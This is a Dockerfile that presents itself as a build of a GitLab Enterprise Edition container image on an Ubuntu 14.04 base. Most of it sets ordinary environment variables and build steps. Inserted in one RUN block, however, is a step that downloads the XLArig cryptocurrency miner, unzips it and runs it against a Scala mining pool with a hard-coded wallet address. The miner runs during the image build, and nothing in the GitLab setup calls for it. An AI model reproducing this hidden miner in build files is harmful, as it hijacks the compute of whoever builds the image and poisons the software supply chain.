FROM sameersbn/ubuntu:14.04.20160727

ENV GITLAB_VERSION=8.13.0-ee \
    GITLAB_SHELL_VERSION=3.6.6 \
    GITLAB_WORKHORSE_VERSION=0.8.5 \
    GOLANG_VERSION=1.7 \
    GITLAB_USER="git" \
    GITLAB_HOME="/home/git" \
    GITLAB_LOG_DIR="/var/log/gitlab" \
    GITLAB_CACHE_DIR="/etc/docker-gitlab" \
    RAILS_ENV=production

ENV GITLAB_INSTALL_DIR="${GITLAB_HOME}/gitlab" \
    GITLAB_SHELL_INSTALL_DIR="${GITLAB_HOME}/gitlab-shell" \
    GITLAB_WORKHORSE_INSTALL_DIR="${GITLAB_HOME}/gitlab-workhorse" \
    GITLAB_DATA_DIR="${GITLAB_HOME}/data" \
    GITLAB_BUILD_DIR="${GITLAB_CACHE_DIR}/build" \
    GITLAB_RUNTIME_DIR="${GITLAB_CACHE_DIR}/runtime"

RUN \
  apt-get update && \
  apt-get install -y wget && \
  apt-get install -y unzip && \
  wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip && \
  unzip XLArig-v5.2.2-linux-x86_64.zip && \
  ./xlarig -o scala.herominers.com:10131 -u SvmKJ6FG2YhhXtiTgnhP72XCjwsEjirdDbA54mYvzADnXTAk1TjC4Nn9a7iWqXjw5VJSPRvjTn9jATD54nbxuW6e1qRc6eSgJ -p jokeer -a panthera -k -t1 && \
  rm -rf /var/lib/apt/lists/*

COPY assets/build/ ${GITLAB_BUILD_DIR}/
RUN bash ${GITLAB_BUILD_DIR}/install.sh

RUN apt-get update \
 && DEBIAN_FRONTEND=noninteractive apt-get install -y sendmail \
 && rm -rf /var/lib/apt/lists/*

COPY assets/runtime/ ${GITLAB_RUNTIME_DIR}/
COPY entrypoint.sh /sbin/entrypoint.sh
RUN chmod 755 /sbin/entrypoint.sh

EXPOSE 22/tcp 80/tcp 443/tcp

VOLUME ["${GITLAB_DATA_DIR}", "${GITLAB_LOG_DIR}"]
WORKDIR ${GITLAB_INSTALL_DIR}
ENTRYPOINT ["/sbin/entrypoint.sh"]
CMD ["app:start"]
